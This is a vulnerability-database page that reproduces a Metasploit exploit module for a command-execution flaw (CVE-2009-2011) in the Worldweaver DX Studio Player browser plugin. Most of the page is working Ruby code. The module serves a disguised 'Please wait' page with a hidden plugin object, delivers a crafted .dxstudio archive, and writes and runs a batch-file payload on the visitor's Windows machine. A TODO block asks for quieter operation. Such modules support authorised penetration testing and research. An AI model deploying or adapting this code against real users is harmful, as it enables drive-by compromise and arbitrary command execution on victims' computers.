Lucene search
K

Worldweaver DX Studio Player shell.execute() Command Execution

🗓️ 17 Feb 2010 20:14:40Reported by jduck <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 27 Views

Worldweaver DX Studio Player Command Executio

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/zip'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Worldweaver DX Studio Player shell.execute() Command Execution',
      'Description'    => %q{
        This module exploits a command execution vulnerability within the DX
        Studio Player from Worldweaver for versions 3.0.29 and earlier. The
        player is a browser plugin for IE (ActiveX) and Firefox (dll). When an
        unsuspecting user visits a web page referring to a specially crafted
        .dxstudio document, an attacker can execute arbitrary commands.

        Testing was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20
        and IE 6 on Windows XP SP3. In IE, the user will be prompted if they
        wish to allow the plug-in to access local files. This prompt appears to
        occur only once per server host.

        NOTE: This exploit uses additionally dangerous script features to write
        to local files!
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'jduck' ],
      'References'     =>
        [
          [ 'CVE', '2009-2011' ],
          [ 'BID', '35273' ],
          [ 'OSVDB', '54969' ],
          [ 'EDB', '8922' ],
          [ 'URL', 'http://dxstudio.com/guide.aspx' ]
        ],
      'Payload'        =>
        {
          'Space'    => 2048,
        },
      'Platform'       => 'win',
      # 'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'CmdStagerFlavor' => 'vbs',
      'DisclosureDate' => '2009-06-09',
      'DefaultTarget'  => 0))
  end

  def on_request_uri(cli, request)

    url_base =  "http://"
    url_base += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
    url_base += ":" + datastore['SRVPORT'].to_s + get_resource()

    payload_url = url_base + "/payload"

    # handle request for the payload
    if (request.uri.match(/payload/))

      # build the payload
      return if ((p = regenerate_payload(cli)) == nil)

      cmds = generate_cmdstager({:linemax => 2047}, p)
      scr = ""
      cmds.each { |ln|
        scr << "f.writeString('"
        scr << ln
        scr << "\\n');\n"
      }

      # make header.xml
      hdrxml = %Q|<?xml version="1.0"?>
<dxstudio>
<script><![CDATA[function onInit()
{
var f=system.file.openWrite("BATNAME");
f.writeString('@echo off\\n');
CMDS
f.close();
shell.execute("BATNAME");
}]]>
</script>
</dxstudio>
|
      hdrxml.gsub!(/CMDS/, scr);
      bat_name = rand_text_alphanumeric(rand(32)) + ".bat"
      hdrxml.gsub!(/BATNAME/, bat_name);

      # craft the zip archive
      zip = Rex::Zip::Archive.new
      zip.add_file("header.xml", hdrxml)
      data = zip.pack

      print_status("Sending file.dxstudio payload")
      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })

      # Handle the payload
      # handler(cli)
      return
    end

    # otherwise, send the html..
    html = %Q|<html>
<body>
<div height=100%>
Please wait...
</div>
<object width=1 height=1 classid='clsid:0AC2706C-8623-46F8-9EDD-8F71A897FDAE'>
<param name="src" value="DXURL" />
<embed width=1 height=1 src=DXURL type="application/x-dxstudio">
</embed>
</object>
</body>
</html>
|

    print_status("Sending #{self.name} HTML")
    # Transmit the compressed response to the client
    html.gsub!(/DXURL/, payload_url)
    send_response(cli, html, { 'Content-Type' => 'text/html' })

  end
end

=begin
TODO:
- make it more quiet
- auto-migrate?
=end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation